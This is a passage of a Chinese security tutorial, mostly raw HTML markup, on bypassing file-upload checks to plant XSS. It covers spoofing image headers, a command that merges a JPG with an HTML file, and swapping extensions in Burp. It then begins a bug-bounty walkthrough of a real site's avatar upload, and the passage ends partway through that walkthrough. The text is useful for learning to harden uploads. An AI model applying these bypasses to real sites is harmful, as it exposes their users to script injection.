UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">htm后綴,能彈窗：<p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><img class="rich_pages wxw-img" data-fileid="503042235" data-ratio="0.1671875" data-s="300,640" data-type="png" data-w="1280" src="https://mmbiz.qpic.cn/mmbiz_png/5ZACCn1bWEziazmT9E8er0HWIz5xKgkfCIUnxJUMwEP4licKBPMpJB9l1T1DyTsXiaRrCXRCBGP4vAHnW2XYMWFeQ/640?wx_fmt=png" style="outline: 0px;box-sizing: border-box !important;word-wrap: break-word !important;width: 677px !important;visibility: visible !important;"><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">亂取的不存在的后綴,不會彈窗：<p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><img class="rich_pages wxw-img" data-fileid="503042238" data-ratio="0.6832298136645962" data-s="300,640" data-type="png" data-w="966" src="https://mmbiz.qpic.cn/mmbiz_png/5ZACCn1bWEziazmT9E8er0HWIz5xKgkfCfybZPA4xZ9LZ7XNIQ5yJW31OWaCIAcEFB08KibS0zOjzpCSyNkW8icnA/640?wx_fmt=png" style="outline: 0px;box-sizing: border-box !important;word-wrap: break-word !important;width: 677px !important;visibility: visible !important;"><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <h6 style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">4.添加jpg頭部繞過</h6><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">這里其實類似上面的gif欺騙攻擊。直接用文件上傳圖片馬制作工具edjpgcom，準備一張圖片，然后拖進去，在框中放入xss的代碼：<p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><img class="rich_pages wxw-img" data-fileid="503042237" data-ratio="0.48936170212765956" data-s="300,640" data-type="png" data-w="799" src="https://mmbiz.qpic.cn/mmbiz_png/5ZACCn1bWEziazmT9E8er0HWIz5xKgkfCR47lVnN0B3LxyUcs9P4ib0JmtzWw1S3E9nbAToVeWPJcgKxia2NDxzVA/640?wx_fmt=png" style="outline: 0px;box-sizing: border-box !important;word-wrap: break-word !important;width: 677px !important;visibility: visible !important;"><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">然后點擊OK制作成功，這樣xss的圖片就有jpg頭部了：<p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><img class="rich_pages wxw-img" data-fileid="503042239" data-ratio="0.23046875" data-s="300,640" data-type="png" data-w="1280" src="https://mmbiz.qpic.cn/mmbiz_png/5ZACCn1bWEziazmT9E8er0HWIz5xKgkfCgibhF1WJYPibich2AIoVakRZ1SsWT4zDJZOJwicngCbtbWjygGSJQ2aD9A/640?wx_fmt=png" style="outline: 0px;box-sizing: border-box !important;word-wrap: break-word !important;width: 677px !important;visibility: visible !important;"><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">這里還可以用命令行形式來制作xss的圖片：copy 1.jpg/b + xss.html/a 2.jpg 。<p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">那么為什么不直接把代碼插入到圖片里，而是要用上面這樣來制作xss的圖片呢？<p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">因為這樣打開的圖片是正確的：<p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><img class="rich_pages wxw-img" data-fileid="503042240" data-ratio="0.638121546961326" data-s="300,640" data-type="png" data-w="724" src="https://mmbiz.qpic.cn/mmbiz_png/5ZACCn1bWEziazmT9E8er0HWIz5xKgkfChVRlJ5j0EZoZsgxdZX76e10vDN5wWvicaNWhJSHnOyM8k8jqRNgdYGg/640?wx_fmt=png" style="outline: 0px;box-sizing: border-box !important;word-wrap: break-word !important;width: 677px !important;visibility: visible !important;"><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">而像下面這樣直接把代碼插入到圖片里，圖片會顯示錯誤：<p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><img class="rich_pages wxw-img" data-fileid="503042241" data-ratio="0.2453125" data-s="300,640" data-type="png" data-w="1280" src="https://mmbiz.qpic.cn/mmbiz_png/5ZACCn1bWEziazmT9E8er0HWIz5xKgkfCwmQZGpHGsTMsPhekHpnVZ3waLql9PLCQGBKr3h6F2OdN7n6yOwACWw/640?wx_fmt=png" style="outline: 0px;box-sizing: border-box !important;word-wrap: break-word !important;width: 677px !important;visibility: visible !important;"><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><img class="rich_pages wxw-img" data-fileid="503042244" data-ratio="0.6920684292379471" data-s="300,640" data-type="png" data-w="643" src="https://mmbiz.qpic.cn/mmbiz_png/5ZACCn1bWEziazmT9E8er0HWIz5xKgkfCF7nWOdYtcEh4FI64UEKYXRatSChqx1ziaDWOT5Voyzk5zaqAAuHk1jA/640?wx_fmt=png" style="outline: 0px;box-sizing: border-box !important;word-wrap: break-word !important;width: 643px !important;visibility: visible !important;"><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">在某些特定環境中，也會檢查圖片是否正確，錯誤的話也將不能上傳成功。所以盡量要用上面的方式來制作xss的圖片。<p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">然后就像上面的gif欺騙攻擊一樣可以繞過一些特定環境。然后必要條件也和上面一樣：<p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><img class="rich_pages wxw-img" data-fileid="503042242" data-ratio="0.09016393442622951" data-s="300,640" data-type="png" data-w="366" src="https://mmbiz.qpic.cn/mmbiz_png/5ZACCn1bWEziazmT9E8er0HWIz5xKgkfCODzVMmzYBLyJfeeP3nzFicFdoEk2zsaVbtzHUibxOZMJdH04Z6vOTQRw/640?wx_fmt=png" style="outline: 0px;box-sizing: border-box !important;word-wrap: break-word !important;width: 366px !important;visibility: visible !important;"><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">訪問，成功彈窗：<p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><img class="rich_pages wxw-img" data-fileid="503042243" data-ratio="0.23255813953488372" data-s="300,640" data-type="png" data-w="860" src="https://mmbiz.qpic.cn/mmbiz_png/5ZACCn1bWEziazmT9E8er0HWIz5xKgkfCX09ebW9TOXAvjGdphJLiavibv1BfYah1FGThBUPhjicSTB8xfUakiapicpA/640?wx_fmt=png" style="outline: 0px;box-sizing: border-box !important;word-wrap: break-word !important;width: 677px !important;visibility: visible !important;"><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <h6 style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">5.添加png頭部繞過</h6><h6 style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> </h6><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">還有png這樣的圖片格式，也可以用上面的方法來，這里就不贅述了。<p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <h6 style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">總結</h6><h6 style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"></h6><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">所以可以在服務器中的源代碼用getimagesizemime_content_type,Fileinfo函數獲取圖像信息，即檢查文件內容時，在開頭加GIF89a頭部，可以對這些函數起到欺騙攻擊，然后在對后綴沒有很過分的檢查時，可以先取gif后綴名，然后用burp再抓包改回htm或者html這樣的規范后綴，然后便可彈窗了；甚至就是對后綴名完全沒有檢查，那么直接寫htm或者html這樣的規范后綴，然后便可彈窗了；也可以用上面的jpg、png這些繞過方法來實現繞過，具體看環境中究竟允許上傳什么類型吧。<p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <h3 style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">SRC實戰</h3><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">上面的通過前端JS進入后臺后進行文件上傳html的過程我在這里就以最近在挖掘某SRC的時候正好碰巧碰到這種漏洞來講解，過程基本一模一樣。<p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> 首先在首頁需要登陸：<p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><img class="rich_pages wxw-img" data-fileid="503042246" data-ratio="0.4704225352112676" data-s="300,640" data-type="png" data-w="710" src="https://mmbiz.qpic.cn/mmbiz_png/5ZACCn1bWEziazmT9E8er0HWIz5xKgkfCiciaUp7f1nMGwRoueBGqiaty1TKkQicibTHSqOu3mBaY14Qb8C36Z8tut0Q/640?wx_fmt=png" style="outline: 0px;box-sizing: border-box !important;word-wrap: break-word !important;width: 677px !important;visibility: visible !important;"><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">這里任何人都可以注冊，所以就注冊一個號，便可以登錄，我這里注冊了一個后，成功登錄：<p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><img class="rich_pages wxw-img" data-fileid="503042245" data-ratio="0.4688" data-s="300,640" src="https://mmbiz.qpic.cn/mmbiz_png/5ZACCn1bWEziazmT9E8er0HWIz5xKgkfCarYRVC2j9ibL8b1hU8U3nxkltCT1vy4faNTuw6FyChl8yu9N5722Dzw/640?wx_fmt=png" data-type="png" data-w="625" style="outline: 0px;box-sizing: border-box !important;word-wrap: break-word !important;width: 625px !important;visibility: visible !important;"><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">然后訪問該網址：https://x.x.x.x/#/personage，進入到個人信息修改頁面：<p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><img class="rich_pages wxw-img" data-fileid="503042247" data-ratio="0.47737068965517243" data-s="300,640" data-type="png" data-w="928" src="https://mmbiz.qpic.cn/mmbiz_png/5ZACCn1bWEziazmT9E8er0HWIz5xKgkfCgVwOXTR02wZuHGUpg1mOf6E5PWLA4zeuKVGxD5nUSsR0k7p4DGFAag/640?wx_fmt=png" style="outline: 0px;box-sizing: border-box !important;word-wrap: break-word !important;width: 677px !important;visibility: visible !important;"><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">點擊上傳頭像：<p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><img class="rich_pages wxw-img" data-fileid="503042248" data-ratio="0.16064981949458484" data-s="300,640" data-type="png" data-w="554" src="https://mmbiz.qpic.cn/mmbiz_png/5ZACCn1bWEziazmT9E8er0HWIz5xKgkfCjV8NMicX4npCYphhTCk3cLRHVP3NRicw7l4OMzc9n6M872MibXklXYm1A/640?wx_fmt=png" style="outline: 0px;box-sizing: border-box !important;word-wrap: break-word !important;width: 554px !important;visibility: visible !important;"><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", 